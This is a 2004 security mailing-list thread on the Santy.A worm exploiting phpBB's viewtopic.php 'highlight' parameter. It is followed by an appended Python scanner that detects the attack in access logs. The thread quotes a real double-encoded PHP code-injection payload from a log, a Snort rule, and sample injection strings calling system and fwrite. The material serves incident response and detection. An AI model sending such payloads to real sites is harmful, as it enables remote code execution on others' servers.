There is a workaround posted http://forums.ir0x0rz.com/viewtopic.php?t=34

I'm hoping this will be enough to protect phpBB installs.

~M

-----Original Message-----
From: M. Shirk [mailto:shirkdog_list@xxxxxxxxxxx]
Sent: Tuesday, December 21, 2004 5:53 PM
To: incidents@xxxxxxxxxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxx
Subject: RE: Worm hitting PHPbb2 Forums

I missed an important "F" on my previous post for these snort sigs.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;)

Shirkdog
http://www.shirkdog.us

>From: "Mike" <mike_sha@xxxxxxx>
>To: <mark@xxxxxxxxx>, "L. Walker" <lwalker@xxxxxxxxxxx>
>CC: <incidents@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
>Subject: RE: Worm hitting PHPbb2 Forums
>Date: Tue, 21 Dec 2004 13:28:27 -0500
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>Mike Fetherston
>
> > -----Original Message-----
> > From: mark@xxxxxxxxx [mailto:mark@xxxxxxxxx]
> > Sent: Tuesday, December 21, 2004 12:47 PM
> > To: L. Walker
> > Cc: incidents@xxxxxxxxxxxxxxxxx; full-disclosure@xxxxxxxxxxxxxxxx
> > Subject: Re: Worm hitting PHPbb2 Forums
> >
> > From what I have read, this can happen in any phpbb version lower than
> > 2.0.11
> >
> > This exploit is becoming frequent. Normally uploading a ddos bot.
> >
> > Mark
> >
> > Quoting "L. Walker" <lwalker@xxxxxxxxxxx>:
> >
> > > Just spotted two clients hit by this. One client didn't update his
> > > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
> > > Chkrootkit says it's Adore, however could be something else. Datacenter
> > > wasn't very smart and has since wiped the server, so no binaries or other
> > > evidence.
> > >
> > > Generation 12 only wiped out PHP files, replacing them with its own
> > > message on other client's PHPbb2 forum. Access logs show:
> > >
> > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> > > /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527
> > > HTTP/1.0" 200 270
> > > "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> > > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> > >
> > > --
> > > L. Walker <lwalker at magi dot net dot au>
> > > Network Administrator / Consultant
> > > --
> >
> > ----------------------------------------------------------------
> > This message was sent using IMP, the Internet Messaging Program.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
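As an added example (not code from this thread, phpBB or the Bleeding Edge ruleset), the Python below scans Apache-style access logs for the request shape L. Walker posted: it decodes the `highlight` value a second time, which is what the `%2527`/`%252e` double encoding in the log is aimed at, flags values that open with a quote followed by a PHP call, and renders any `chr()` chain into readable text for the analyst. The log lines embedded in it are constructed, and the log layout and regexes are assumptions about a typical combined-format log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not real traffic). Lines 1 and 3 carry the
# double-encoded "'.func(" shape described in the thread; line 2 is a normal search.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=12&highlight=%2527%252Esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"
10.0.0.6 - - [21/Dec/2004:18:08:01 +1100] "GET /forum/viewtopic.php?t=34&highlight=password HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [21/Dec/2004:18:09:44 +1100] "GET /forum/viewtopic.php?p=99&highlight=%2527%252Efwrite(fopen(chr(97)),chr(98))%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
CHR_RE = re.compile(r'chr\((\d{1,3})\)')
# After both decoding rounds, a quote that closes the application's string followed by
# "." and a PHP call is the injection shape; a genuine search term never begins that way.
INJECT_RE = re.compile(r"^'\s*\.\s*([A-Za-z_]\w*)\s*\(")

def decode_chr_chain(expr):
    """Render a chr(n).chr(m)... chain as text so the analyst can read the payload."""
    return ''.join(chr(int(c)) for c in CHR_RE.findall(expr) if int(c) < 256)

def double_decode_highlight(path):
    """Return highlight as the vulnerable code saw it: parse_qs decodes once, unquote again."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    values = params.get('highlight')
    return unquote(values[0]) if values else None

def scan_log(text):
    """Return one finding per viewtopic.php request whose highlight carries PHP code."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or '/viewtopic.php' not in m.group(3):
            continue
        ip, when, path, status = m.groups()
        highlight = double_decode_highlight(path)
        hit = INJECT_RE.match(highlight) if highlight else None
        if hit:
            findings.append({'ip': ip, 'time': when, 'status': int(status),
                             'function': hit.group(1),
                             'decoded_chr': decode_chr_chain(highlight)})
    return findings

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run it over a real log with `scan_log(open(path).read())`; the `decoded_chr` field tells you at a glance what each hit tried to run or write, and a 200 status on a hit is the cue to check the web root for dropped files.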